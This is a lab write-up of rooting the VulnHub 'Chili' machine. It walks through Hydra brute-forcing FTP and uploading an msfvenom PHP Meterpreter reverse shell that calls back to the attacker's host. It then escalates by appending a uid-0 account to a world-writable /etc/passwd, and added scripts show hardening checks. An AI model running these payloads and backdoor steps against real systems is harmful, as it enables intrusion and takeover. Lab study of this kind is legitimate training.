I recently picked a few easy machines off the VulnHub site; this one feels well suited to beginners.

First, sweep the subnet the target sits on to find its IP address:
root@kali:/# nmap -sP 192.168.200.129/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 08:56 CST
Nmap scan report for 192.168.200.1
Host is up (0.00016s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.200.2
Host is up (0.00012s latency).
MAC Address: 00:50:56:E6:47:0B (VMware)
Nmap scan report for 192.168.200.128
Host is up (0.00075s latency).
MAC Address: 00:0C:29:4A:31:59 (VMware)
Nmap scan report for 192.168.200.130
Host is up (0.00097s latency).
MAC Address: 00:0C:29:1C:DC:AB (VMware)
Nmap scan report for 192.168.200.254
Host is up (0.00092s latency).
MAC Address: 00:50:56:FA:DC:49 (VMware)
Nmap scan report for 192.168.200.129
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 27.85 seconds

(-sP is the legacy spelling of -sn, a ping sweep with no port scan; Nmap 7.80 still accepts it. 192.168.200.129 is the Kali box itself, which is why no MAC address is printed for it.) The target is 192.168.200.130. With the IP known, port-scan it:
root@kali:/# nmap -sT -p1-65535 192.168.200.130
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 08:58 CST
Nmap scan report for 192.168.200.130
Host is up (0.00056s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
MAC Address: 00:0C:29:1C:DC:AB (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.93 seconds

Only ports 21 (FTP) and 80 (HTTP) are open. Start with the web service.
Viewing the page source reveals a few hinted words, so use CeWL to scrape the site's vocabulary into a file:

cewl http://192.168.200.130 > user.txt

Then expand the entries in user.txt into upper- and lower-case variants (Unix login names are case-sensitive, so Chili and chili are different candidates) and brute-force the FTP login with Hydra, or with Metasploit's ftp_login scanner.
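The case-expansion step above is done by hand in the write-up. The script below is an added example, not part of the original post: it turns CeWL's output into a de-duplicated, case-mutated user list and shows the Hydra invocation that consumes it. The sample words and the rockyou.txt path are assumptions; the real list comes from the cewl command above.

```shell
#!/bin/sh
# Added example (not from the write-up): turn the words CeWL scraped
# from the site into a case-mutated user list for Hydra. The sample
# words below are constructed; the real list is produced by
#   cewl http://192.168.200.130 > user.txt

# mutate_case: for every word on stdin emit the word as seen, all
# lower-case, all upper-case and Capitalised, dropping blank lines and
# duplicates while keeping first-seen order (Hydra tries top-down).
mutate_case() {
    awk '
        function emit(s) { if (!(s in seen)) { seen[s] = 1; print s } }
        NF == 0 { next }
        {
            emit($0)
            emit(tolower($0))
            emit(toupper($0))
            emit(toupper(substr($0, 1, 1)) tolower(substr($0, 2)))
        }'
}

# mutate_case_count: how many candidates the list on stdin expands to
mutate_case_count() {
    mutate_case | wc -l | tr -d ' '
}

# Constructed sample standing in for user.txt
SAMPLE_WORDS='Chili
pepper
SUNSET'

# Usage against the target (shown, not run here). -L/-P take user and
# password files; the rockyou path is an assumption, any list will do;
# -t 4 keeps the number of parallel FTP connections modest.
#   mutate_case < user.txt > users.txt
#   hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -t 4 ftp://192.168.200.130

printf '%s\n' "$SAMPLE_WORDS" | mutate_case
```

Each scraped word yields at most four candidates, and identical variants (pepper is already lower-case) collapse, so the list stays small enough to pair with a large password file.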
The brute force turns up the credentials chili:a1b2c3d4. Log in over FTP:
root@kali:/# ftp 192.168.200.130
Connected to 192.168.200.130.
220 (vsFTPd 3.0.3)
Name (192.168.200.130:root): chili
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

The banner identifies vsFTPd 3.0.3. Poking around shows the account is not chrooted to its home directory: it can change straight into the web root:
ftp> pwd
257 "/home/chili" is the current directory
ftp> cd /var/www/html/
250 Directory successfully changed.
ftp> pwd
257 "/var/www/html" is the current directory
ftp>

Listing that directory shows the .nano directory is world-writable (drwxrwxrwx: read, write and execute for owner, group and everyone else), so an FTP login, or any local user, can drop files into a directory the web server serves:
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    4 0        0            4096 Sep 08 13:12 .
drwxr-xr-x    3 0        0            4096 Sep 08 11:41 ..
drwxrwxrwx    2 0        0            4096 Oct 03 04:25 .nano
drwxr-xr-x    2 0        0            4096 Sep 08 13:12 .vim
-rw-r--r--    1 0        0           74290 Oct 23  2018 Chile_WEB.jpg
-rw-r--r--    1 0        0             657 Sep 08 11:44 index.html
226 Directory send OK.
ftp>

Upload a PHP Meterpreter payload into .nano:
// first generate the payload
root@kali:/# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.200.129 LPORT=4444 -f raw > shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 30691 bytes
// upload it with put:
ftp> put /shell.php shell.php
local: /shell.php remote: shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
30691 bytes sent in 0.00 secs (186.4281 MB/s)
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Oct 04 21:36 .
drwxr-xr-x    4 0        0            4096 Sep 08 13:12 ..
-rw-r--r--    1 1000     1000            0 Sep 08 13:14 index.html
-rw-------    1 1000     1000        30691 Oct 04 21:36 shell.php
226 Directory send OK.
ftp>
// note: the web server must be able to read the file before it will run
ftp> chmod 777 shell.php
200 SITE CHMOD command ok.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Oct 04 21:36 .
drwxr-xr-x    4 0        0            4096 Sep 08 13:12 ..
-rw-r--r--    1 1000     1000            0 Sep 08 13:14 index.html
-rwxrwxrwx    1 1000     1000        30691 Oct 04 21:36 shell.php
226 Directory send OK.
ftp>

The upload arrives as -rw------- owned by uid 1000 (chili) because vsftpd's default local_umask is 077. Apache runs as www-data, so it cannot open the file and the PHP would never execute; that, not some magic about 777, is why the permissions have to change. 777 is more than needed: chmod 644 (the ftp client's chmod command sends SITE CHMOD) gives www-data the read access the PHP interpreter requires without leaving a world-writable executable in the web root. Once the file is readable, start a Metasploit handler on Kali and then request the file from a browser:
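The two misconfigurations exploited in this step (an FTP account that is not chrooted, and a world-writable directory inside a PHP-enabled document root) are cheap to check for. The following is an added example, not part of the write-up or of the VM; the web root and the two vsftpd.conf fragments are constructed stand-ins, and it makes no claim about the VM's real vsftpd.conf beyond what the listings above show.

```shell
#!/bin/sh
# Added example (not from the write-up): check for the two conditions
# that made the upload possible. All sample data is constructed.

# 1) World-writable directories under a web root. Any such directory in
#    a PHP-enabled document root is an arbitrary-code-execution primitive
#    for every account that can write there (here: the FTP user chili).
find_world_writable_dirs() {
    find "$1" -type d -perm -002 2>/dev/null | sort
}

# Constructed stand-in for /var/www/html as listed above:
# .nano is 777, .vim is 755. Prints the temporary root it created.
make_sample_webroot() {
    root=$(mktemp -d)
    mkdir "$root/.nano" "$root/.vim"
    chmod 777 "$root/.nano"
    chmod 755 "$root/.vim"
    : > "$root/index.html"
    printf '%s\n' "$root"
}

# 2) vsftpd configuration. Without chroot_local_user=YES a local user
#    starts in $HOME but may cd anywhere Unix permissions allow, exactly
#    as chili did with "cd /var/www/html". local_umask defaults to 077,
#    which is why shell.php landed as -rw------- and www-data could not
#    read it. Both configs are constructed, not the VM's real file.
#    (vsftpd refuses a session whose chroot root is writable unless
#    allow_writeable_chroot=YES is set, so keep the home dir read-only.)
WEAK_VSFTPD_CONF='listen=YES
local_enable=YES
write_enable=YES'

HARDENED_VSFTPD_CONF='listen=YES
local_enable=YES
write_enable=YES
local_umask=022
chroot_local_user=YES'

# strip comments and whitespace so "key = value" and "# key=value" behave
vsftpd_normalise() {
    printf '%s\n' "$1" | sed 's/[[:space:]]//g; s/#.*//'
}

# vsftpd_chroots_users: succeeds if the config text in $1 pins local
# users inside their home directory
vsftpd_chroots_users() {
    vsftpd_normalise "$1" | grep -qx 'chroot_local_user=YES'
}

# vsftpd_umask: effective local_umask for config text $1 (077 if unset)
vsftpd_umask() {
    u=$(vsftpd_normalise "$1" |
        awk -F= '$1 == "local_umask" { v = $2 } END { print v }')
    printf '%s\n' "${u:-077}"
}

# Walk-through on the constructed data
root=$(make_sample_webroot)
find_world_writable_dirs "$root"            # <root>/.nano
vsftpd_umask "$WEAK_VSFTPD_CONF"            # 077
vsftpd_chroots_users "$WEAK_VSFTPD_CONF" || echo 'weak: local users are not chrooted'
vsftpd_chroots_users "$HARDENED_VSFTPD_CONF" && echo 'hardened: chroot_local_user=YES'
rm -rf "$root"
```

Run the find check against the real document root on a box you own (find /var/www -type d -perm -002); on the VM it would list /var/www/html/.nano, which is the whole story of the foothold.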
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.200.129
LHOST => 192.168.200.129
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.200.129:4444

(LPORT is left at its default of 4444, which matches the msfvenom payload.) Requesting http://192.168.200.130/.nano/shell.php in a browser (the Debian default document root is /var/www/html) runs the payload and a Meterpreter session comes back. It runs as www-data, so privilege escalation is the next step:
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.200.129:4444
[*] Meterpreter session 1 opened (192.168.200.129:4444 -> 192.168.200.131:37610) at 2020-10-05 09:43:42 +0800
meterpreter > getuid
Server username: www-data (33)
meterpreter >

To enumerate escalation paths, upload enumy (a Linux privilege-escalation scanner) through the same FTP session, make it executable and run it from the Meterpreter shell:
ftp> put /root/enumy64 enumy64
local: /root/enumy64 remote: enumy64
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
1010192 bytes sent in 0.03 secs (31.9555 MB/s)
ftp> chmod 777 enumy64
200 SITE CHMOD command ok.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Oct 04 21:46 .
drwxr-xr-x    4 0        0            4096 Sep 08 13:12 ..
-rwxrwxrwx    1 1000     1000      1010192 Oct 04 21:46 enumy64
-rw-r--r--    1 1000     1000            0 Sep 08 13:14 index.html
-rwxrwxrwx    1 1000     1000        30691 Oct 04 21:36 shell.php
226 Directory send OK.
ftp>

Running it produces the following:
meterpreter > shell
Process 672 created.
Channel 0 created.
pwd
/var/www/html/.nano
./enumy64
(enumy ASCII-art banner) https://github.com/luke-goddard/enumy

Current User Info
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Version
Linux version 4.19.0-10-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.132-1 (2020-07-24)
hostname chili
Umask u=rwx,g=rx,o=rx

Last Login
----------
Username Port From Latest
root tty1 Tue Sep 8 13:11:53 -0400 2020
chili tty1 Tue Sep 8 13:12:50 -0400 2020

User Accounts
-------------
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
chili:x:1000:1000:chili,,,:/home/chili:/bin/bash

Who Else Is Logged On
---------------------
21:48:00 up 13 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

Groups
------
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=101(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=102(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=103(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=1000(chili) gid=1000(chili) groups=1000(chili),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
uid=104(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=105(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=106(ftp) gid=113(ftp) groups=113(ftp)

Severity: MEDIUM  Name: sysctl ptrace is configured insecurly  -rw-r--r-- 1 root root 0 Oct 4 21:48 /proc/sys/kernel/yama/ptrace_scope
Severity: INFO  Name: Found an new root user with UID 0: root  -rw-r--rw- 1 root root 1450 Sep 8 12:23 /etc/passwd
Severity: INFO  Name: Found an new root user with GID 0: root  -rw-r--rw- 1 root root 1450 Sep 8 12:23 /etc/passwd
Severity: INFO  Name: Found an new user that can be logged into: root  -rw-r--rw- 1 root root 1450 Sep 8 12:23 /etc/passwd
Severity: INFO  Name: Found an new user that can be logged into: sync  -rw-r--rw- 1 root root 1450 Sep 8 12:23 /etc/passwd
Severity: HIGH  Name: Found a home directory that does not exist, but is attached to an existing user
Severity: HIGH  Name: Found a home directory that does not exist, but is attached to an existing user
Severity: HIGH  Name: Found a home directory that does not exist, but is attached to an existing user
Severity: HIGH  Name: Found a home directory that does not exist, but is attached to an existing user
Severity: HIGH  Name: Found a home directory that does not exist, but is attached to an existing user
Severity: HIGH  Name: Found a home directory that does not exist, but is attached to an existing user
Severity: HIGH  Name: Found a home directory that does not exist, but is attached to an existing user
Severity: HIGH  Name: Found a home directory that does not exist, but is attached to an existing user
Severity: HIGH  Name: Found a home directory that does not exist, but is attached to an existing user
Severity: INFO  Name: Found an new user that can be logged into: chili  -rw-r--rw- 1 root root 1450 Sep 8 12:23 /etc/passwd
Severity: HIGH  Name: Found a home directory that does not exist, but is attached to an existing user
Severity: HIGH  Name: Found a home directory that does not exist, but is attached to an existing user
Severity: HIGH  Name: Low entropy file that could be a private key  -rw-r--r-- 1 root root 20661 Feb 11 2019 /usr/share/X11/xkb/symbols/pk
Severity: INFO  Name: Config file could contain passwords  -rw-r--r-- 1 root root 494 Feb 10 2019 /usr/share/libc-bin/nsswitch.conf
Severity: HIGH  Name: CAP_NET_RAW capablities enabled on file  -rwxr-xr-x 1 root root 69368 Jan 13 2020 /usr/bin/ping
Severity: MEDIUM  Name: Executable capable of spawning reverse shells found  -rwxr-xr-x 1 root root 1168776 Apr 18 2019 /usr/bin/bash
Severity: MEDIUM  Name: Executable capable of spawning reverse shells found  -rwxr-xr-x 1 root root 736776 Apr 20 16:23 /usr/bin/openssl
Severity: MEDIUM  Name: Executable capable of spawning reverse shells found  -rwxr-xr-x 2 root root 3201864 Jul 21 15:27 /usr/bin/perl
Severity: MEDIUM  Name: Executable capable of spawning reverse shells found  -rwxr-xr-x 1 root root 8156 Jul 21 15:27 /usr/bin/cpan
Severity: MEDIUM  Name: Abnormal GUID enabled executable found  -rwxr-sr-x 1 root crontab 43568 Oct 11 2019 /usr/bin/crontab
Severity: MEDIUM  Name: Abnormal GUID enabled executable found  -rwxr-sr-x 1 root tty 14736 May 4 2018 /usr/bin/bsd-write
Severity: MEDIUM  Name: Abnormal SUID enabled executable found  -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
Severity: INFO  Name: Config file could contain passwords  -rw-r--r-- 1 root root 239 Sep 27 2017 /usr/lib/tmpfiles.d/passwd.conf
Severity: MEDIUM  Name: Found backup /etc/shadow file  -rw-r----- 1 root shadow 965 Sep 8 12:10 /etc/shadow-
Severity: INFO  Name: Found backup /etc/passwd file  -rw-r--r-- 1 root root 1437 Sep 8 12:10 /etc/passwd-
Severity: MEDIUM  Name: Other permissions are higher than Group permissions  -rw-r--rw- 1 root root 1450 Sep 8 12:23 /etc/passwd
Severity: INFO  Name: Config file could contain passwords  -rw-r--r-- 1 root root 5849 Sep 8 12:15 /etc/vsftpd.conf
Severity: INFO  Name: Config file could contain passwords  -rw-r--r-- 1 root root 494 Feb 10 2019 /etc/nsswitch.conf
Generating JSON
Json saved at location -> enumy.json
Total files scanned -> 25183

Most of this is noise (the SUID/SGID binaries and reverse-shell-capable interpreters are standard Debian), but one finding matters: /etc/passwd is mode -rw-r--rw-, writable by everyone, which enumy flags as "Other permissions are higher than Group permissions". The passwd file is world-readable by design; world-writable is the vulnerability. The second field of a passwd entry may hold a password hash directly, in which case login and su use it and never consult /etc/shadow for that account, so we can append a uid-0 user of our own:
// first generate a DES-crypt hash for the password "test" with perl
root@kali:/# /usr/bin/perl -le 'print crypt("test","test")'
teH0wLIpW0gyQ
// append the new uid-0 account to /etc/passwd on the target
meterpreter > shell
Process 783 created.
Channel 2 created.
echo "test:teH0wLIpW0gyQ:0:0:root:/root:/bin/bash" >> /etc/passwd

crypt() takes its salt from the first two characters of the second argument, which is why the hash starts with "te". Use the appending ">>" here: the original run used a single ">", which truncates /etc/passwd and discards every existing account, root included. That happened to still work on a throwaway VM, but on anything real it breaks every other login on the box. Now switch to the new user and read the flag:
meterpreter > shell
Process 788 created.
Channel 4 created.
su test
Password: test
whoami
test
ls /root
proof.txt
cat /root/proof.txt
Sun_CSR.Chili.af6d45da1f1181347b9e2139f23c6a5b

Two details of this transcript are worth understanding. The password is echoed after the prompt because the Meterpreter shell has no tty, so su cannot turn echo off. And whoami reports test rather than root because whoami resolves the effective uid (0) to the first /etc/passwd entry carrying that uid: in this run root's own line had been overwritten, leaving test as the only uid-0 entry. With the line appended instead, whoami prints root while id -u still reports 0; either way the shell is root and /root/proof.txt is readable.
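The passwd manipulation in the last two steps, done against a constructed copy rather than the real file, as an added example that is not part of the write-up. It checks the precondition enumy reported (the "other write" bit on the file), builds the same test:teH0wLIpW0gyQ entry, appends it, and then resolves uid 0 the way whoami does, so the difference between ">" and ">>" is visible without touching a live system. The sample passwd contents and the temporary-file names are constructed.

```shell
#!/bin/sh
# Added example (not from the write-up): the /etc/passwd step done
# against a constructed temporary file, plus a check for the
# precondition. Nothing here touches the real /etc/passwd.

# DES-crypt hash of "test" with salt "te" (crypt() takes the salt from
# the first two characters of its second argument), as produced by
#   perl -le 'print crypt("test","test")'
HASH='teH0wLIpW0gyQ'

# world_writable: succeed if "other" has the write bit on file $1, i.e.
# the -rw-r--rw- mode enumy reported for /etc/passwd on the target.
world_writable() {
    find "$1" -prune -perm -002 2>/dev/null | grep -q .
}

# sample_passwd: constructed stand-in for the target's /etc/passwd,
# deliberately made world-writable; prints the temporary file's path.
sample_passwd() {
    f=$(mktemp)
    {
        printf 'root:x:0:0:root:/root:/bin/bash\n'
        printf 'www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n'
        printf 'chili:x:1000:1000:chili,,,:/home/chili:/bin/bash\n'
    } > "$f"
    chmod 646 "$f"
    printf '%s\n' "$f"
}

# passwd_line: entry for a new uid-0/gid-0 user $1. Because the hash
# sits in the second field, su/login use it directly and never consult
# /etc/shadow for this account.
passwd_line() {
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$1" "$HASH"
}

# add_uid0_user: append, never truncate. A single ">" here would wipe
# every existing account, root included.
add_uid0_user() {
    passwd_line "$1" >> "$2"
}

# name_for_uid: what whoami prints for uid $2 given passwd file $1;
# the first entry with that uid wins.
name_for_uid() {
    awk -F: -v uid="$2" '$3 == uid { print $1; exit }' "$1"
}

# account_count: number of entries left in passwd file $1
account_count() {
    grep -c . "$1"
}

# Walk-through on the constructed file
f=$(sample_passwd)
world_writable "$f" && echo "$f is world-writable, proceeding"
add_uid0_user test "$f"
name_for_uid "$f" 0        # root: the original uid-0 entry still comes first
account_count "$f"         # 4
rm -f "$f"
```

On a real engagement the same idea applies to any credential store the low-privilege user can write: check the mode first, append rather than replace, and record what you changed so it can be reverted.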